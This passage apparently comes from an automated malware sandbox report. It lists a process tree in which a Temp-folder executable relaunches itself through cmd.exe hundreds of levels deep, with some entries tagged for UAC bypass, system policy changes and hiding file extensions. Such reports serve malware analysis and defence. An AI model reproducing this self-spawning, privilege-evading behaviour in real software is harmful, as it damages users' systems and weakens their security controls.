        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        74⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        75⤵
        
        PID:444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        76⤵
        
        PID:4184
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        77⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        78⤵
        
        PID:376
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        79⤵
        
        PID:840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        80⤵
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        81⤵
        
        PID:4592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        82⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        83⤵
        
        PID:1300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        84⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        85⤵
        
        PID:3816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        86⤵
        
        PID:3236
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        87⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        88⤵
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        89⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        90⤵
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        91⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        92⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        93⤵
        
        PID:2052
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        94⤵
        
        PID:4540
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        95⤵
        
        PID:4116
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        95⤵
        
        PID:224
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        96⤵
        
        PID:1712
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        97⤵
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        97⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        98⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        99⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        100⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        101⤵
        
        PID:1092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        102⤵
        
        PID:3952
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        103⤵
        
        PID:3848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        104⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        105⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        106⤵
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        107⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        108⤵
        
        PID:1192
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        109⤵
        
        PID:4612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        110⤵
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        111⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        112⤵
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        113⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        114⤵
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        115⤵
        
        PID:244
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        116⤵
        
        PID:1948
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        117⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        117⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        118⤵
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        119⤵
        
        PID:1992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        120⤵
        
        PID:3720
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        121⤵
        UAC bypass
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        121⤵
        
        PID:1144
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        122⤵
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        123⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        124⤵
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        125⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        126⤵
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        127⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        128⤵
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        129⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        130⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        131⤵
        
        PID:2852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        132⤵
        
        PID:3400
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        133⤵
        Modifies visibility of file extensions in Explorer
        
        PID:772
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        133⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        134⤵
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        135⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        136⤵
        
        PID:3624
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        137⤵
        
        PID:4588
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        137⤵
        
        PID:2640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        138⤵
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        139⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        140⤵
        
        PID:3920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        141⤵
        
        PID:3344
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        141⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        142⤵
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        143⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        144⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        145⤵
        
        PID:4040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        146⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        147⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        148⤵
        
        PID:4948
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        149⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        149⤵
        
        PID:4784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        150⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        151⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        152⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        153⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        154⤵
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        155⤵
        
        PID:3624
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        156⤵
        
        PID:3960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        157⤵
        UAC bypass
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        157⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        158⤵
        
        PID:1208
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        159⤵
        Modifies visibility of file extensions in Explorer
        
        PID:460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        160⤵
        
        PID:4156
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        161⤵
        
        PID:4424
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        162⤵
        
        PID:3008
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        163⤵
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        163⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        164⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        165⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        166⤵
        
        PID:3580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        167⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        167⤵
        
        PID:1460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        168⤵
        
        PID:2532
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        169⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:2368
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        170⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        171⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        172⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        173⤵
        
        PID:1140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        174⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        175⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2088
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        176⤵
        
        PID:5092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        177⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        177⤵
        
        PID:3400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        178⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1376
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        179⤵
        
        PID:3844
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        179⤵
        
        PID:3080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        180⤵
        
        PID:3800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        181⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        181⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        182⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        183⤵
        
        PID:1144
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        184⤵
        
        PID:964
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        185⤵
        
        PID:4072
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        186⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        187⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        188⤵
        
        PID:4644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        189⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        189⤵
        
        PID:2640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        190⤵
        
        PID:2112
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        191⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3340
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        191⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        192⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:1608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        193⤵
        
        PID:584
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        193⤵
        
        PID:1684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        194⤵
        
        PID:2360
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        195⤵
        UAC bypass
        
        PID:4012
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        195⤵
        
        PID:2484
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        196⤵
        
        PID:3080
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        197⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        197⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:1948
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        198⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:3732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        199⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        199⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:3800
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        200⤵
        
        PID:3016
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        201⤵
        
        PID:3956
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        201⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:4676
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        202⤵
        
        PID:4888
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        203⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        203⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        204⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:1456
        
        C:\Windows\System32\Conhost.exe
        
